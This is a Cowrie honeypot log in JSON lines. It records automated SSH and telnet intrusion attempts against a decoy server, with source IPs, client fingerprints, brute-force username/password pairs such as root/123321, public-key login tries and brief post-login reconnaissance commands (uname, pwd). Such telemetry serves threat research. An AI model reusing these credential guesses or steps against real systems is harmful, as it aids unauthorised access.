{"eventid":"cowrie.session.closed","duration":32.14107871055603,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:00.192249Z","src_ip":"212.227.235.229","session":"09566e6760b3"}
{"eventid":"cowrie.session.closed","duration":32.410452365875244,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:00.467391Z","src_ip":"212.227.235.229","session":"efe926314d26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51470,"dst_ip":"1.2.3.4","dst_port":23,"session":"76467832df04","protocol":"telnet","message":"New connection: 212.227.235.229:51470 (1.2.3.4:23) [session: 76467832df04]","sensor":"my-vps","timestamp":"2025-08-28T02:50:02.196864Z"}
{"eventid":"cowrie.session.closed","duration":30.863474130630493,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:02.588077Z","src_ip":"212.227.235.229","session":"92c0704bc001"}
{"eventid":"cowrie.session.closed","duration":31.445963621139526,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:09.887697Z","src_ip":"212.227.235.229","session":"03bcd90f8771"}
{"eventid":"cowrie.session.closed","duration":32.366724729537964,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:18.303070Z","src_ip":"212.227.235.229","session":"b68f5edeb511"}
{"eventid":"cowrie.session.closed","duration":31.32346796989441,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:25.515902Z","src_ip":"212.227.235.229","session":"417abee09c33"}
{"eventid":"cowrie.session.closed","duration":31.400533199310303,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:33.597326Z","src_ip":"212.227.235.229","session":"76467832df04"}
{"eventid":"cowrie.session.closed","duration":47.5868399143219,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:36.054900Z","src_ip":"212.227.235.229","session":"62af402c49df"}
{"eventid":"cowrie.session.closed","duration":47.06791663169861,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:38.093555Z","src_ip":"212.227.235.229","session":"8814d40e612a"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":33392,"dst_ip":"1.2.3.4","dst_port":22,"session":"d17f15c5fa94","protocol":"ssh","message":"New connection: 194.233.79.134:33392 (1.2.3.4:22) [session: d17f15c5fa94]","sensor":"my-vps","timestamp":"2025-08-28T02:50:54.116034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:50:54.933580Z","src_ip":"194.233.79.134","session":"d17f15c5fa94"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:50:54.934309Z","src_ip":"194.233.79.134","session":"d17f15c5fa94"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:50:57.185829Z","src_ip":"194.233.79.134","session":"d17f15c5fa94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:50:58.327409Z","src_ip":"194.233.79.134","session":"d17f15c5fa94"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T02:50:58.328144Z","src_ip":"194.233.79.134","session":"d17f15c5fa94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:58.661726Z","src_ip":"194.233.79.134","session":"d17f15c5fa94"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:50:58.662833Z","src_ip":"194.233.79.134","session":"d17f15c5fa94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54162,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bae5afd97e5","protocol":"ssh","message":"New connection: 212.227.235.229:54162 (1.2.3.4:22) [session: 0bae5afd97e5]","sensor":"my-vps","timestamp":"2025-08-28T02:52:09.854313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:52:10.395043Z","src_ip":"212.227.235.229","session":"0bae5afd97e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:52:10.395673Z","src_ip":"212.227.235.229","session":"0bae5afd97e5"}
{"eventid":"cowrie.login.success","username":"root","password":"0885334311%%","message":"login attempt [root/0885334311%%] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:52:13.427027Z","src_ip":"212.227.235.229","session":"0bae5afd97e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:52:15.129310Z","src_ip":"212.227.235.229","session":"0bae5afd97e5"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T02:52:15.130098Z","src_ip":"212.227.235.229","session":"0bae5afd97e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:52:15.722878Z","src_ip":"212.227.235.229","session":"0bae5afd97e5"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:52:16.140575Z","src_ip":"212.227.235.229","session":"0bae5afd97e5"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":60978,"dst_ip":"1.2.3.4","dst_port":22,"session":"deed1ede421c","protocol":"ssh","message":"New connection: 194.233.79.134:60978 (1.2.3.4:22) [session: deed1ede421c]","sensor":"my-vps","timestamp":"2025-08-28T02:52:33.693894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:52:33.779329Z","src_ip":"194.233.79.134","session":"deed1ede421c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:52:34.029147Z","src_ip":"194.233.79.134","session":"deed1ede421c"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:52:35.440831Z","src_ip":"194.233.79.134","session":"deed1ede421c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:52:36.685153Z","src_ip":"194.233.79.134","session":"deed1ede421c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37776,"dst_ip":"1.2.3.4","dst_port":22,"session":"cccdc0308aed","protocol":"ssh","message":"New connection: 212.227.235.229:37776 (1.2.3.4:22) [session: cccdc0308aed]","sensor":"my-vps","timestamp":"2025-08-28T02:54:01.968724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:54:01.970134Z","src_ip":"212.227.235.229","session":"cccdc0308aed"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T02:54:02.077207Z","src_ip":"212.227.235.229","session":"cccdc0308aed"}
{"eventid":"cowrie.login.failed","username":"blockchain","password":"blockchain","message":"login attempt [blockchain/blockchain] failed","sensor":"my-vps","timestamp":"2025-08-28T02:54:02.394280Z","src_ip":"212.227.235.229","session":"cccdc0308aed"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:54:03.502729Z","src_ip":"212.227.235.229","session":"cccdc0308aed"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55724,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ca69d3b77f4","protocol":"ssh","message":"New connection: 217.72.205.35:55724 (1.2.3.4:22) [session: 1ca69d3b77f4]","sensor":"my-vps","timestamp":"2025-08-28T02:54:12.566039Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:54:12.567094Z","src_ip":"217.72.205.35","session":"1ca69d3b77f4"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":56218,"dst_ip":"1.2.3.4","dst_port":22,"session":"9508e1b0d377","protocol":"ssh","message":"New connection: 194.233.79.134:56218 (1.2.3.4:22) [session: 9508e1b0d377]","sensor":"my-vps","timestamp":"2025-08-28T02:54:14.481375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:54:14.530099Z","src_ip":"194.233.79.134","session":"9508e1b0d377"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:54:14.696293Z","src_ip":"194.233.79.134","session":"9508e1b0d377"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:54:16.547482Z","src_ip":"194.233.79.134","session":"9508e1b0d377"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:54:19.123139Z","src_ip":"194.233.79.134","session":"9508e1b0d377"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35280,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f2655846157","protocol":"ssh","message":"New connection: 212.227.235.229:35280 (1.2.3.4:22) [session: 0f2655846157]","sensor":"my-vps","timestamp":"2025-08-28T02:54:33.102972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:54:33.103801Z","src_ip":"212.227.235.229","session":"0f2655846157"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T02:54:33.206401Z","src_ip":"212.227.235.229","session":"0f2655846157"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","sensor":"my-vps","timestamp":"2025-08-28T02:54:33.413980Z","src_ip":"212.227.235.229","session":"0f2655846157"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T02:54:33.414572Z","src_ip":"212.227.235.229","session":"0f2655846157"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","sensor":"my-vps","timestamp":"2025-08-28T02:54:33.518238Z","src_ip":"212.227.235.229","session":"0f2655846157"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2a:ec:77:c5:62:41:ca:44:18:b2:83:c9:14:e5:75:51","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxpgkYt+zpKZ4aM5tZ9NynQP88iMSPIsgR4Jovfosly8NBvgRM7uyEmXefMNEvYvFkOqAdCwuLYx2woPHDvQcrenP1ftPQJxQ0lPJdb4FG2WHApem+EzM5aTK4cjPAncXQNTBz/npDFSpLp5IuLqfqNP3vgEvCmr6SsJ+nHdUdMUM95SY1Q9Hd9eYY1O+XBmYG5k/NjpiHwQQbXnZ9pfhrlpUe8ubQ0PklDDfNYICMggpp9rmJDrCVZMYTBXWoQn699dUrruiICT8GJMhmuAiUW0iFHqDbicnC7+fsMg6P0f0nJg659IMfXVtGttw7YWHjEgcRSpwThNc/Do9VOMghYiXlSUCpaKWp1febAPPfTzkA2bFlaD/kbIFLEYqIAwdZ987q4HRI6OjEZuqFTntMcsIRy4FEi9366KmZILnLTTa00r7tbPH86zWzTltg7HCqwz6WreyiQT/ZWwu3RTYCu376Ao27PO32D0lfg6PkOLvyK3709QOPqJoOzom6iRHifaFfFkFltOsUqrfhzRk4ckGBFaHUMhczGYcCAAhWOeQos/pMgvw+e8kKXc7qv99cvMDTa5Gf3OcWNjpTiJ0eY9uh3DVWn+XbIdUVcDJm4rykQTLM0RgEMTUco2OzEkzMl+5Lybf784utn51aBr2mZgrXTASFWCze/TbOjVP3bw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T02:54:33.519596Z","src_ip":"212.227.235.229","session":"0f2655846157"}
